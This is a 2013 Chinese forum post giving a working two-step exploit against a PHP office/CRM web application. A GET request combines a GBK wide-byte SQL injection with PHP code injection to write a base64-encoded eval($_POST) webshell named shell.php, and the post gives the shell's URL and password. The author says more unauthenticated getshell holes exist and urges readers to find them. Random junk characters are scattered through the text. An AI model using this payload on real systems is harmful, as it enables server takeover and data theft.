此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了.
' ?1 L# d P, m- m
( Z- G, G% H3 p4 U$ ^9 p$ N
- L7 q' I* d/ tEXP:4 O/ m" v, ]' m4 ]8 e
' V& X: a. b$ ^) m' @% }
第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}
8 A0 `' v! Z9 y- \/ v; [6 p2 I; A- u 2 R J6 M/ L, ?$ m6 Y
第二步: [GET]http://site/general/email/index.php \: o- V a6 T/ Z
9 ?. \7 M$ k' f( U; I2 eSHELL: http://site/general/email/shell.php 密码C
2 S, f. Y; V# F& x/ T0 g! `
& Y, W* o5 Z$ p2 h- J( B
) M Z f; Q" p- P+ ~0 t# n$ ^& A此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好
: K5 C5 z8 [/ X! a% X
9 v8 y3 E8 x. k0 e" J$ {, f有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~
; J4 h; ~2 H/ n
3 h& A# }5 I. T" l3 j" |9 Z+ z$ Z) n: F- N8 b
|
发表于 2013-2-4 16:19:29
收藏
支持
反对